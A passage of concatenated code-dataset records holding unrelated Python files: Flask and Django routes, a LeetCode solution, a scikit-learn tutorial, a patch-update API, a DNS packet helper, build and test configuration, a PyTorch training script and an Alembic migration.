mycol.find_one({\"name\":rman})#check if reporting manager exist or not\n       \t    if man:#if true\n       \t        g=mycol.insert(mydict)#add to database's table\n       \t        k=man['under'] #copy the list of employees in the reporting manager \"under\" field\n       \t        k.append(g)#append the reporting manager \"under\" field with new employee ObjectID\n       \t        mycol.update_one({'_id':man['_id']},{'$set':{'under':k}})#update the reporting manager \"under\" field\n       \t    else:\n       \t        return render_template(\"input.html\",error=\"True\")#if False then pass \"error\" as True to alert \n        return redirect(\"/\")#after submitting the detail , redirect to Home page\n    return render_template(\"input.html\",error=False)#if request is GET that is just to open \"input.html\"\n\n@app.route(\"/\")\ndef hello():\n    return render_template(\"home.html\")\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"148582962","text":"from django.conf.urls import url\nfrom requirements.rest_api import views\n\nurlpatterns = [\n    url(r'^requirement-headers/$', views.RequirementHeaderListCreateAPIView.as_view()),\n    url(r'^requirement/(?P[0-9]+)/offers/$', views.RequirmentWithOffersListAPIView.as_view()),\n    url(r'^requirement-header/(?P[0-9]+)/$', views.RequirementHeaderRetrieveUpdateDestroyAPIView.as_view()),\n    url(r'^requirement-header/(?P[0-9]+)/requirement-lines/$', views.RequirementLineListCreateAPIView.as_view()),\n    url(r'^requirement-header/(?P[0-9]+)/submit/$', views.RequirementSubmitAPIView.as_view()),\n    url(r'^requirement-header/(?P[0-9]+)/cancel/$', views.RequirementCancelAPIView.as_view()),\n\n    url(r'^requirement-line/(?P[0-9]+)/$', views.RequirementLineRetrieveUpdateDestroyAPIView.as_view()),\n    url(r'^reorder-requirement-lines/$', views.RequirementLineReorderAPIView.as_view()),\n    url(r'^requirement-suggestions/$', views.RequirementSuggestionListAPIView.as_view()),\n    url(r'^it-needs/$', views.ITNeedListCreateAPIView.as_view()),\n    url(r'^partner/$', views.RequirementsForPartnerListAPIView.as_view()),\n    url(r'^(?P[0-9]+)/development-languages/$', views.RequirementDevelopmentLanguageCreateAPIView.as_view()),\n\n    url(r'^(?P[0-9]+)/upload-file/$', views.RequirementUploadFileAPIView.as_view()),\n    url(r'^requirement-line/(?P[0-9]+)/upload-file/$', views.RequirementLineUploadFileAPIView.as_view()),\n    url(r'^(?P[0-9]+)/download-file/$', views.RequirementDownloadFileAPIView.as_view()),\n    url(r'^requirement-line/(?P[0-9]+)/download-file/$', views.RequirementLineDownloadFileAPIView.as_view()),\n]\n","sub_path":"epad/requirements/rest_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"620097936","text":"# - * - coding:utf8 - * - -\n###########################################\n# Author: Tinkle\n# E-mail: shutingnjupt@gmail.com\n# Name:  Number Complement.py\n# Creation Time: 2018/3/5\n###########################################\n'''\nGiven a positive integer, output its complement number. The complement strategy is to flip the bits of its binary representation.\n\nNote:\nThe given integer is guaranteed to fit within the range of a 32-bit signed integer.\nYou could assume no leading zero bit in the integer’s binary representation.\nExample 1:\nInput: 5\nOutput: 2\nExplanation: The binary representation of 5 is 101 (no leading zero bits), and its complement is 010. So you need to output 2.\nExample 2:\nInput: 1\nOutput: 0\nExplanation: The binary representation of 1 is 1 (no leading zero bits), and its complement is 0. So you need to output 0.\n\n'''\nclass Solution(object):\n\tdef findComplement(self,num):\n\t\t'''\n\t\t:param num:  int\n\t\t:return:  int\n\t\t'''\n\t\ttmp = num\n\t\tans = 1\n\t\twhile(num):\n\t\t\tans = ans*2\n\t\t\tnum = num >>1\n\t\treturn (ans-1) ^ tmp","sub_path":"BitManipulation/476. Number Complement.py","file_name":"476. Number Complement.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"237798911","text":"\"\"\"\r\nLinear Regression\r\nIf the desired output consists of one or more continuous variables, then the task is called regression P107.\r\nit is given in P118(scikit-learn user guide, Release 0.19.1, Nov21 2017).\r\n\"\"\"\r\n\r\nfrom sklearn import linear_model, datasets\r\nimport numpy as np\r\n\r\n\"\"\"step1: loading the data\"\"\"\r\ndiabetes = datasets.load_diabetes()\r\ndiabetes_X = diabetes.data  # It contains 442 samples\r\ndiabetes_y = diabetes.target\r\n\r\n\"\"\"step2: splitting the data into training data and test data\"\"\"\r\ndiabetes_X_train = diabetes_X[:-20]\r\ndiabetes_y_train = diabetes_y[:-20]\r\ndiabetes_X_test = diabetes_X[-20:]\r\ndiabetes_y_test = diabetes_y[-20:]\r\n\"\"\"step3: using one estimator\"\"\"\r\nregr = linear_model.LinearRegression()\r\nregr.fit(diabetes_X_test, diabetes_y_test)\r\n\r\n\"\"\"step 4: estimating the model\"\"\"\r\nerror = np.mean((regr.predict(diabetes_X_test)-diabetes_y_test)**2)  # the mean square error. 0 means perfect!\r\nprint('the mean square error is: %s' % error)\r\nrelationship = regr.score(diabetes_X_test, diabetes_y_test)\r\n# variance score, 1 means perfect prediction and 0 means that there is no linear relationship between X and y.\r\nprint('THe variance score is: %s' % relationship)\r\n\r\n","sub_path":"scikit-learn tutorial/tutorial03.py","file_name":"tutorial03.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"269430409","text":"from django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom rest_framework.views import APIView\nfrom apis.tool import bsdiffTool\nfrom apis.tool import mongoOperate\nfrom django.conf import settings\nimport time\nimport os\nimport json\n\nserverHost = 'http://'+settings.SERVER_ADDR + \"/index/rest_api/ymm\"\n\nclass CheckUpdateClass(APIView):\n    def post(self, request):\n        print(request.body)\n        params = json.loads(request.body)\n        print(params)\n\n        MD5 = params.get('MD5')\n        version = params.get('version')\n\n        patch_url = None\n        latest_file_url = None\n        old_file_url = None\n        #找出MD5相关的历史数据\n        #创建db 及files collction对象\n        mongoOperateTool = mongoOperate.MongoOperate('test')\n        coll = mongoOperateTool.get_collection('files')\n\n        #同类型文件的最新版本\n        same_md5_file =  mongoOperateTool.get_one_doc(coll, {'MD5': MD5})\n        print('md5+++'+MD5)\n        print(same_md5_file)\n        if not same_md5_file:\n            return HttpResponse(json.dumps({'result': 0, 'errorMsg':'文件MD5无效'}))\n        old_file_url = same_md5_file['filepath']\n        old_version = same_md5_file['version']\n        all_same_files = mongoOperateTool.get_many_docs(coll, {'name': same_md5_file['name']})\n        all_same_files_list = list(all_same_files);\n        if not len(all_same_files_list) > 0:\n            return HttpResponse(json.dumps({'result': 0, 'errorMsg':'文件MD5无效'}))\n\n        #筛选最新上传的file\n        latestFile = None\n        sorted_all_same_files = sorted(all_same_files_list, key=lambda all_same_file: all_same_file['time'])\n        latestFile = sorted_all_same_files[-1]\n        if not latestFile['version'] > old_version:\n            return HttpResponse(json.dumps({'result': 0, 'errorMsg':'没有可更新版本'}))\n        latest_file_url = latestFile['filepath']\n\n        #补丁version生成规则 原version : 新version\n        #fix: 好像不需要version\n        patch_name = latestFile['name']\n        patch_version = old_version + ':' + latestFile['version']\n        #查看是否生成过该补丁\n        patchColl = mongoOperateTool.get_collection('patches')\n        single_patch = mongoOperateTool.get_one_doc(patchColl, {'name': patch_name, 'version': patch_version})\n\n        #若已存在则直接使用\n        if single_patch:\n            patch_url = single_patch['filepath']\n        else:\n            #获取文件目录\n            baseDir = os.path.dirname(os.path.abspath(__name__))\n            patches_path = os.path.join(baseDir, 'static','patches',patch_version)\n            if not os.path.isdir(patches_path):\n                os.mkdir(patches_path)\n            patch_url = os.path.join(patches_path, patch_name)\n\n        patchTool = bsdiffTool.BsdiffTool()\n        patchTool.getPatch(old_file_url, latest_file_url, patch_url)\n        md5Code = patchTool.getFileMd5(patch_url)\n\n        patch_downloadUrl = serverHost + \"/download/?MD5=\" + md5Code\n        latest_downloadUrl = serverHost + \"/download/?MD5=\" + latestFile['MD5']\n\n        condition = {'MD5':md5Code}\n        newRecord = {'name':patch_name, 'version':patch_version, 'filepath':patch_url, 'MD5':md5Code, 'time':time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())), 'fileUrl': patch_downloadUrl}\n\n        mongoOperateTool.update_collection_withCondition(patchColl, newRecord, condition)\n        # uploadTip 0.建议升级 1.强制升级 2.静默升级\n        return HttpResponse(json.dumps({'result': 1, 'fileUrl': latest_downloadUrl,'fileMd5':latestFile['MD5'], 'patchUrl': patch_downloadUrl, 'patchMd5':md5Code, 'version':latestFile['version'], 'uploadTip':'1'}))\n","sub_path":"apis/rest_api/checkUpdate.py","file_name":"checkUpdate.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"159652810","text":"import threading\n\n#공유자원\n# 모든 스레드에서 접근이 가능한 자원\n#전역 변수\n\ng_num=0\n# Lock 객체\nlock=threading.Lock()\n\ndef thread_main():\n    global g_num\n\n    #critical section\n    #임계영역\n    #어떤 스레드에서 공유자원에 접근한 후\n    #수정, 변경하려는 코드\n    lock.acquire()\n    for _ in range(100000):\n        g_num+=1\n    lock.release()\n\nthreads=[]\n\nfor _ in range(50):\n    th=threading.Thread(target=thread_main)\n    threads.append(th)\n\nfor th in threads:\n    th.start()\n\nfor th in threads:\n    th.join()\nprint(f'g_num:{g_num}')","sub_path":"basic/multithread_exam/multithread_race_condition.py","file_name":"multithread_race_condition.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"316876067","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport struct\nimport socket\nfrom io import BytesIO\n# https://tools.ietf.org/html/rfc1035\n\n\nclass DNS:\n    def __init__(self, id, query, answer):\n        self.id = id\n        self.query = query\n        self.answer = answer\n\n\nclass Query:\n    def __init__(self, _name, _type, _class):\n        self._name = _name\n        self._type = _type\n        self._class = _class\n\n\nclass Answer:\n    def __init__(self, _name, _type, _class, _ttl, _rData):\n        self._name = _name\n        self._type = _type\n        self._class = _class\n        self._ttl = _ttl\n        self._rData = _rData\n\n\ndef parse(plainResonse: bytes, query: None or 'offetQuestion' or 'offetAnswer' or 'offetAuthority' or 'offetAdditional' = None):\n    # https://tools.ietf.org/html/rfc1035#24\n    try:\n        offetHeader = 0\n        _id = struct.unpack_from('>H', plainResonse, 0)[0]\n        # tt = struct.unpack_from('>H', plainResonse, 2)[0]\n        _qd_count = struct.unpack_from('>H', plainResonse, 4)[0]\n        _an_count = struct.unpack_from('>H', plainResonse, 6)[0]\n        _ns_count = struct.unpack_from('>H', plainResonse, 8)[0]\n        _ar_count = struct.unpack_from('>H', plainResonse, 10)[0]\n        # print(_qd_count, _an_count, _ns_count, _ar_count)\n        offetQuestion = offetHeader + 12\n        if query == 'offetQuestion':\n            return offetQuestion\n        dns = DNS(_id, [], [])\n        # Question\n        for i in range(_qd_count):\n            offetQuestion, query = parseQD(plainResonse, offetQuestion)\n            dns.query.append(query)\n        # Answer\n        offetAnswer = offetQuestion\n        if query == 'offetAnswer':\n            return offetAnswer\n        for i in range(_an_count):\n            offetAnswer, answer = parse_RR(plainResonse, offetAnswer)\n            if len(answer._rData) <= 15:  # \\d{3}.\\d{3}.\\d{3}.\\d{3}\n                dns.answer.append(answer)\n        # Authority records\n        offetAuthority = offetAnswer\n        if query == 'offetAuthority':\n            return offetAuthority\n        for i in range(_ns_count):\n            offetAuthority, _ = parse_RR(plainResonse, offetAuthority)\n        # Additional records\n        offetAdditional = offetAuthority\n        if query == 'offetAdditional':\n            return offetAdditional\n        for i in range(_ar_count):\n            offetAdditional, _ = parse_RR(plainResonse, offetAdditional)\n        return dns\n    except:\n        print('not a valid DNS message')\n        return None\n\n\ndef parse_field(plainResonse: bytes, offset):\n    _len = plainResonse[offset]\n    if _len == 0:\n        return None, offset + 1\n    _offset_begin = offset + 1\n    _offset_end = _offset_begin + _len\n    _value = plainResonse[_offset_begin: _offset_end].decode()\n    return _value, _offset_end\n\n\ndef parse_name(plainResonse: bytes, offset):\n    names = []\n    while True:\n        value, offset = parse_field(plainResonse, offset)\n        if value:\n            names.append(value)\n        else:\n            break\n    return '.'.join(names), offset\n\n\ndef parseQD(plainResonse: bytes, offset_QD):\n    '''\n    https://tools.ietf.org/html/rfc1035#25\n    QNAME       xN\n    QTYPE       x2\n    QCLASS      x2\n    '''\n    offsetQName = offset_QD\n    _qname, offsetQType = parse_name(plainResonse, offsetQName)\n    offsetQClass = offsetQType + 2\n    offsetEnd = offsetQClass + 2\n    _qtype = struct.unpack_from('>H', plainResonse, offsetQType)[0]\n    _qclass = struct.unpack_from('>H', plainResonse, offsetQClass)[0]\n    query = Query(_qname, _qtype, _qclass)\n    return offsetEnd, query\n\n\ndef parse_RR(plainResonse: bytes, offset_RR):\n    '''\n    https://tools.ietf.org/html/rfc1035#10\n    https://tools.ietf.org/html/rfc1035#28\n    # NAME      xN\n    # TYPE      x2\n    # CLASS     x2\n    # TTL       x4\n    # RDLENGTH  x2\n    # RDATA     xN\n    '''\n\n    offsetName = offset_RR\n    _name, offsetType = parse_name(plainResonse, offsetName)\n    offsetClass = offsetType + 2\n    offsetTTL = offsetClass + 2\n    offsetRdLength = offsetTTL + 4\n    RdLength = struct.unpack_from('>H', plainResonse, offsetRdLength)[0]\n    offsetRData = offsetRdLength + 2\n    offsetEnd = offsetRData + RdLength\n    _type = struct.unpack_from('>H', plainResonse, offsetType)[0]\n    _class = struct.unpack_from('>H', plainResonse, offsetClass)[0]\n    _ttl = struct.unpack_from('>I', plainResonse, offsetTTL)[0]\n    # _rData = socket.inet_ntoa(plainResonse[offsetRData: offsetRData + RdLength])\n    _rData = struct.unpack_from(\n        ''.join(['B' for x in range(RdLength)]), plainResonse, offsetRData)\n    _rData = [str(x) for x in list(_rData)]\n    _rData = '.'.join(_rData)\n    answer = Answer(_name, _type, _class, _ttl, _rData)\n    return offsetEnd, answer\n\n\ndef _write_query(_io, domain):\n    # 写域名\n    labels = domain.split('.')\n    for label in labels:\n        bytes_label = label.encode()\n        _io.write(len(bytes_label).to_bytes(1, byteorder='big', signed=False))\n        _io.write(bytes_label)\n    _io.write(b'\\x00')\n    # 写类型\n    # type A, class IN\n    type_and_class = bytearray(4)\n    struct.pack_into('>HH', type_and_class, 0, 1, 1)\n    _io.write(type_and_class)\n\n\ndef _write_answer(_io, domain, ip, ttl):\n    # 写域名\n    labels = domain.split('.')\n    for label in labels:\n        bytes_label = label.encode()\n        _io.write(len(bytes_label).to_bytes(1, byteorder='big', signed=False))\n        _io.write(bytes_label)\n    _io.write(b'\\x00')\n    # 其它\n    type_class_ttl_iplength = bytearray(10)\n    struct.pack_into('>HHIH', type_class_ttl_iplength, 0, 1, 1, ttl, 4)\n    _io.write(type_class_ttl_iplength)\n    # 写ip\n    _io.write(socket.inet_aton(ip))\n\n\ndef gen_A_query(domain, id=0):\n    # https://tools.ietf.org/html/rfc1035#24\n    # qd =1, an=ns=ar=0,\n    # QR(1) Opcode(4) AA(1) TC(1) RD(1) RA(1)   Z(3)   RCODE(4)\n    # 0     0000       0      0     0    0      000     0000\n    f = BytesIO()\n    # 写头部\n    header = bytearray(12)\n    struct.pack_into('>HHHHHH', header, 0, id, 0, 1, 0, 0, 0)\n    f.write(header)\n    # 写query\n    _write_query(f, domain)\n    data = f.getvalue()\n    f.close()\n    return data\n\n\ndef gen_empty_response(domain, id=0):\n    f = BytesIO()\n    header = bytearray(12)\n    struct.pack_into('>HHHHHH', header, 0, id, 33152, 1, 0, 0, 0)\n    f.write(header)\n    _write_query(f, domain)\n    data = f.getvalue()\n    f.close()\n    return data\n\n\ndef gen_A_response(domain, ip, id=0, ttl=19808):\n    # https://tools.ietf.org/html/rfc1035#24\n    # an =1, qd=ns=ar=0,\n    # QR(1) Opcode(4) AA(1) TC(1) RD(1) RA(1)   Z(3)   RCODE(4)\n    # 1     0000       0      0     1    0      000     0000\n    f = BytesIO()\n    # 写头部\n    header = bytearray(12)\n    struct.pack_into('>HHHHHH', header, 0, id, 33152, 1, 1, 0, 0)\n    f.write(header)\n    _write_query(f, domain)\n    _write_answer(f, domain, ip, ttl)\n    data = f.getvalue()\n    f.close()\n    return data\n\n\nif __name__ == '__main__':\n    res_bytes = gen_A_query('www.example.com', id=0)\n    print(res_bytes)\n    parse(res_bytes)\n    res_bytes = gen_A_response('www.example.com', '93.184.216.34', id=0)\n    print(res_bytes)\n    parse(res_bytes)\n","sub_path":"util/dns_helper.py","file_name":"dns_helper.py","file_ext":"py","file_size_in_byte":7135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"455278117","text":"#  ___________________________________________________________________________\n#\n#  EGRET: Electrical Grid Research and Engineering Tools\n#  Copyright 2019 National Technology & Engineering Solutions of Sandia, LLC\n#  (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.\n#  Government retains certain rights in this software.\n#  This software is distributed under the Revised BSD License.\n#  ___________________________________________________________________________\n\n'''\npytest configuration options for test_unit_commitment.py,\nper the pytest examples\n'''\nimport pytest\n\ndef pytest_addoption(parser):\n    parser.addoption(\"--runmip\", action=\"store_true\", default=False,\n                     help=\"If enabled, this solves the MIP for each unit \"\n                          \"commitment instance. For now, the solver gurobi \"\n                          \"is required for this test.\"\n                    )\n\ndef pytest_collection_modifyitems(config, items):\n    if not config.getoption(\"--runmip\"):\n        skip_mip = pytest.mark.skip(reason=\"need --runmip option to run\")\n        for item in items:\n            if \"mip\" in item.keywords:\n                item.add_marker(skip_mip)\n","sub_path":"egret/models/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"196374558","text":"import nltk\nfrom nltk import grammar, parse\n\ncp = parse.load_parser('base_parse.fcfg', trace=1)\n\nsent = 'the big blue box between the small red squares'\n\ntokens = [x.lower() for x in sent.split()]\ntrees = cp.parse(tokens)\nfor line in trees:\n    line.draw()\n    #for word in line:\n    #    word.draw()\n\n\n\"\"\"\n\nprint('----------------')\nfor i, tree in enumerate(trees):\n    for node in tree:\n        for n in node:\n            for nn in n:\n                print(nn, \"nn\")\n                if type(nn) != str:\n                    print(nn.label().keys())\n                    print(type(nn.label()[\"*type*\"]), \"label\")\n                    for nnn in nn:\n                        print(nnn, \"nnn\")\n                        if type(nnn) != str:\n                            print(type(nnn.label()))\n        print(\"==============\")\n    print(i)\n    print(type(tree))\n    print(tree)\"\"\"","sub_path":"TalkAboutObjects/Parsers/homemade_parser.py","file_name":"homemade_parser.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"535050096","text":"from fractions import Fraction\n\n\nfor a in range(1,10):\n\t\n\trangeb = range(1,10)\n\trangec = range(1,10)\n\trangeb.remove(a)\n\trangec.remove(a)\n\t\n\tfor b in rangeb:\n\t\tfor c in rangeb:\n\t\t\n\t\t\tfirst_frac = Fraction(int(str(a)+str(b)),int(str(a)+str(c)))\n\n\t\t\tsec_frac = Fraction(int(str(b)+str(a)),int(str(a)+str(c)))\t\n\n\t\t\tthird_frac = Fraction(int(str(b)+str(a)),int(str(c)+str(a)))\n\n\t\t\tfourth_frac = Fraction(int(str(a)+str(b)),int(str(c)+str(a)))\n\n\t\t\ttest_frac = Fraction(b,c)\n\n\n\t\t\tif first_frac == test_frac and test_frac < 1:\n\n\t\t\t\tprint(int(str(a)+str(b)),int(str(a)+str(c))) \n\n\t\t\tif sec_frac == test_frac and test_frac < 1: \n\n\t\t\t\tprint(int(str(b)+str(a)),int(str(a)+str(c)))\n\n\t\t\tif third_frac == test_frac and test_frac < 1:\n\n\t\t\t\tprint(int(str(b)+str(a)),int(str(c)+str(a)))\n\n\t\t\tif third_frac == test_frac and test_frac < 1:\n\n\t\t\t\tprint(int(str(a)+str(b)),int(str(c)+str(a)))\n\n","sub_path":"prob33.py","file_name":"prob33.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"56883809","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb  3 18:29:48 2020\n\n@author: yyhhlancelot\n\"\"\"\nimport torch\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom data_loader import *\nfrom config import *\nfrom model_temp import *\nfrom model_new import *\nimport numpy as np\nimport random\nimport os\n\ndef read2list(config):\n    \n    train_paths_list = []\n    train_labels_list = []\n    val_paths_list = []\n    val_labels_list = []\n    with open(config.train_path) as f:\n        for line in f.readlines():\n            line = line.split(' ')\n            train_paths_list.append(line[0])\n            train_labels_list.append(int(line[1][0]))\n    with open(config.val_path) as f:\n        for line in f.readlines():\n            line = line.split(' ')\n            if int(line[1][0]) == 1:\n                val_paths_list.append(line[0])\n                val_labels_list.append(int(line[1][0]))\n            \n    return train_paths_list, train_labels_list, val_paths_list, val_labels_list\n\ndef shuffle_train(paths_list, labels_list):\n    randnum = random.randint(0, 100)\n    random.seed(randnum)\n    random.shuffle(paths_list)\n    random.seed(randnum)\n    random.shuffle(labels_list)\n\ndef label_counts(dir_path):\n    return len(os.listdir(dir_path))\n\ndef train():\n    \n    config = Config()\n    \n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n    \n    train_paths_list, train_labels_list, val_paths_list, val_labels_list = read2list(config)\n    \n    shuffle_train(train_paths_list, train_labels_list)\n    \n    dataset = SeisMatLoader(config, train_paths_list, train_labels_list)\n    \n    train_loader = DataLoader(dataset = dataset, \n                              batch_size = config.batch_size,\n                              shuffle = False)\n    val_batch_tensor, val_label_tensor = change_val_format(config, val_paths_list, val_labels_list)\n    \n    # print(val_batch_tensor.size(), val_label_tensor.size())\n    \n    # model = HorizonClassifyNet().to(device)\n    \n\n    \n    len_0 = label_counts(config.train_label_0_dir)\n    len_1 = label_counts(config.train_label_1_dir)\n    weights = [1/len_0, 1/len_1]\n    class_weights = torch.FloatTensor(weights).cuda()\n    \n    criterion = torch.nn.CrossEntropyLoss(weight = class_weights)\n\n    \n        \n    models = [HorizonClassifyNet().to(device), Res18(BasicBlock).to(device)]\n    \n    for model_index, model in enumerate(models):\n        optimizer = torch.optim.Adam(model.parameters(), \n                                     weight_decay = config.weight_decay,\n                                     lr = config.learning_rate)\n        train_loss = [np.inf]\n        val_loss = [np.inf]\n        for epoch in range(10):\n            iter = 0\n            for x, y in train_loader:\n                model.train()\n                optimizer.zero_grad()\n                y_pred = model(x)\n    \n                # print(y_pred)\n                # print(y)\n                y = y.view(y.size()[0])\n                loss = criterion(y_pred, y)\n                # print(loss)\n                loss.backward()\n                optimizer.step()\n                train_loss.append(loss.item())\n                if iter % 10 == 0:    \n                    print('epoch : {} - Training loss : {:0.4f}'.format(epoch, train_loss[-1]))\n                \n                if iter % 50 == 0:\n                    model.eval()\n                    test_list = np.random.choice(range(val_batch_tensor.size(0)), config.batch_size)\n                    y_pred = model(val_batch_tensor[test_list])\n                    loss = criterion(y_pred, val_label_tensor[test_list])\n                    val_loss.append(loss.item())\n                    print('epoch : {} - Val loss : {:0.4f}'.format(epoch, val_loss[-1]))\n                iter += 1\n        if model_index == 0:\n            path = 'J:/desktop_material/master_dissertation/code/point2/model_save/inline3_conv_inline5.pt'\n        elif model_index == 1:\n            path = 'J:/desktop_material/master_dissertation/code/point2/model_save/inline3_res_inline5.pt'\n        \n        torch.save(model.state_dict(), path)\n# import torch\n# # input_ = torch.randn(2, 2, requires_grad = True)\n\n# input_ = torch.tensor([[0.7, 0.3], [0.4, 0.6]])\n# # input_1 = torch.tensor([[0.4, 0.6]])\n# # print(input_)\n# # # target = torch.randint(high = 2, size = (2,), dtype = torch.int64)\n# target1 = torch.tensor([0, 1])\n# # target2 = torch.tensor([[1, 0]]).to(torch.float)\n# # target3 = torch.tensor([[1, 0]]).to(torch.float)\n# # print(target1)\n# # print(target2)\n# # print(target3)\n\n# loss1 = torch.nn.functional.cross_entropy(input_, target1, reduction = 'none')\n# # loss2 = torch.nn.functional.binary_cross_entropy(input_, target2, reduction = 'none')\n# # loss3 = torch.nn.functional.binary_cross_entropy_with_logits(input_, target3, reduction = 'none')\n# # loss4 = torch.nn.functional.binary_cross_entropy_with_logits(input_1, target3, reduction = 'none')\n\n# print(loss1)\n# print(loss2)\n# print(loss3)\n# print(loss4)\n\n# from torch.autograd import Variable\n# from torch import nn\n# net_out = Variable(torch.Tensor([[1,2,3]]))\n# target = Variable( torch.LongTensor([0]))\n\n# criterion = nn.CrossEntropyLoss()\n# criterion(net_out,target)\n\nif __name__ == '__main__':\n    \n    train()","sub_path":"core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"56176388","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport sys\nassert(\"3.7\" in sys.version)\nfrom CASIA import CASIA\nfrom PIL import Image \nfrom mini_lambs import JOIN\nimport os\nimport logging\nfrom logging import debug,info,warning\nlogging.basicConfig(level=logging.INFO)\n\n\ndef load_and_partition_images(basepath):\n\tcas = CASIA()\n\tpath = JOIN(os.getcwd(),basepath)\n\tchar_dict = {}\n\tfor filename in os.listdir(path):\n\t\tinfo(\"Current filename: {}\".format(filename))\n\t\timg_lab_list = cas.load_gnt_file(JOIN(path,filename))\n\t\tchin_char_path = JOIN(os.getcwd(),\"chin_char_{}\".format(basepath[7:-4])) # extract out ['trn'/'tst'/'cv'] respectively\n\t\ttry: os.mkdir(chin_char_path)\n\t\texcept: warning(\"Directory {} already made - moving on...\".format(chin_char_path))\n\t\tfor img,lab in img_lab_list:\n\t\t \tchin_char_path_char = JOIN(chin_char_path,\"{}\".format(lab))\n\t\t \tif(lab not in os.listdir(chin_char_path)): os.mkdir(chin_char_path_char)\n\t\t \tnum_elems = len(os.listdir(chin_char_path_char))\n\t\t \timg.save(JOIN(chin_char_path_char, '{}_{}.jpg'.format(lab,num_elems)))\n\treturn\n\t\n\nload_and_partition_images('HWDB1.1trn_gnt')\nload_and_partition_images('HWDB1.1cv_gnt')\nload_and_partition_images('HWDB1.1tst_gnt')\n\n","sub_path":"data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"61266895","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport copy\nSetOption(\"random\", 1)\n\n# 使用环境变量,CCFLAGS表示的是编译器选项,LINKFLAGS表示的是需要链接的库文件,CPPPATH表示的是程序编译时需要查找的头文件的路径\nenv = Environment(CCFLAGS='-fpermissive -g -O2 -pthread -std=c++11', LINKFLAGS='-pthread -Wl,--start-group', CPPPATH=[\"#src\", \"#depend/rapidjson/include\", \"#depend\"])\n\n# 编译cryptopp库\nenv.Command(None, None, \"cd depend/cryptopp && make\")\n\n# 将静态库cryptopp放入LIBS中\nenv.Replace(LIBS=[File('depend/cryptopp/libcryptopp.a')])\nExport(\"env\")\n\n# 调用SConscript,编译fly库,将编译产生的文件放在build/fly目录下\nfly = SConscript(\"src/SConscript\", variant_dir=\"build/fly\", duplicate=0)\n# 将编译产生的fly库文件.a放到build/bin目录下\nenv.Install(\"build/bin\", fly)\n\n# 将静态库fly放入LIBS中,后面test_server编译会使用到fly静态库\nenv.Append(LIBS=fly)\nExport(\"env\")\n\n# 表示将test_server 放到build目录下\ntest_server = SConscript(\"test/SConscript1\", variant_dir=\"build/test_server\", duplicate=0)\nenv.Install(\"build/bin\", test_server)\n\ntest_client = SConscript(\"test/SConscript2\", variant_dir=\"build/test_client\", duplicate=0)\nenv.Install(\"build/bin\", test_client)\n\ntest_server_wsock = SConscript(\"test/SConscript3\", variant_dir=\"build/test_server_wsock\", duplicate=0)\nenv.Install(\"build/bin\", test_server_wsock)\n","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"249661530","text":"\"\"\"table admin\n\nRevision ID: 3392bc189467\nRevises: \nCreate Date: 2019-05-10 08:05:55.532562\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3392bc189467'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('admin',\n    sa.Column('id', sa.Integer(), nullable=False),\n    sa.Column('username', sa.String(length=64), nullable=True),\n    sa.Column('email', sa.String(length=120), nullable=True),\n    sa.Column('password_hash', sa.String(length=128), nullable=True),\n    sa.Column('status', sa.String(length=32), nullable=True),\n    sa.Column('timestamp', sa.DateTime(), nullable=True),\n    sa.PrimaryKeyConstraint('id')\n    )\n    op.create_index(op.f('ix_admin_email'), 'admin', ['email'], unique=True)\n    op.create_index(op.f('ix_admin_status'), 'admin', ['status'], unique=False)\n    op.create_index(op.f('ix_admin_timestamp'), 'admin', ['timestamp'], unique=False)\n    op.create_index(op.f('ix_admin_username'), 'admin', ['username'], unique=True)\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_index(op.f('ix_admin_username'), table_name='admin')\n    op.drop_index(op.f('ix_admin_timestamp'), table_name='admin')\n    op.drop_index(op.f('ix_admin_status'), table_name='admin')\n    